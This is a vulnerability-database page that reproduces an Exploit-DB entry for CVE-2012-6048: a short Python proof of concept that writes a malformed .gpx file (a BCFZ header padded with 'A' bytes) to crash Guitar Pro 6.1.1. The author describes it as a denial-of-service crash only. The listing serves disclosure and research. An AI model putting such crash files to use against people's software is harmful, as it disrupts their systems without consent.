Lucene search
+L

Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)

🗓️ 09 May 2012 00:00:00Reported by condisType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Guitar Pro 6.1.1 r10791(.gpx) crash Proof of Concep

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2012-6048
27 Nov 201202:00
cve
cvelist
Cvelist
CVE-2012-6048
27 Nov 201202:00
cvelist
euvd
EUVD
EUVD-2012-5922
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-6048
27 Nov 201204:49
nvd
prion
Prion
Design/Logic Flaw
27 Nov 201204:49
prion
redhatcve
RedhatCVE
CVE-2012-6048
22 May 202505:51
redhatcve
#!/usr/bin/python

# ---------------------------------------------------------
# Guitar Pro 6.1.1 r10791 (.gpx) Crash POC
# found by condis
#
# Date      : 01 May 2012 AD
# Tested on : Windows XP Professional SP3 PL
#
# Description :
#
# Each load of malformated file into the program ends up
# with crash, but place of crash and registers values
# differ every time o_O"
#
# In my opinion, this bug does not allow for anything else
# except getting to a DoS situation, therefore no further
# research was done.
# ---------------------------------------------------------

evil  = "BCFZ\x04\x10\x01\x00"
evil += "A" * 953

file = open('ogonek_and_cooh_-_not_my_type.gpx', 'w')
file.write(evil)
file.close()

print "Sex, drugs & drum'n'bass!"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 May 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.02445
34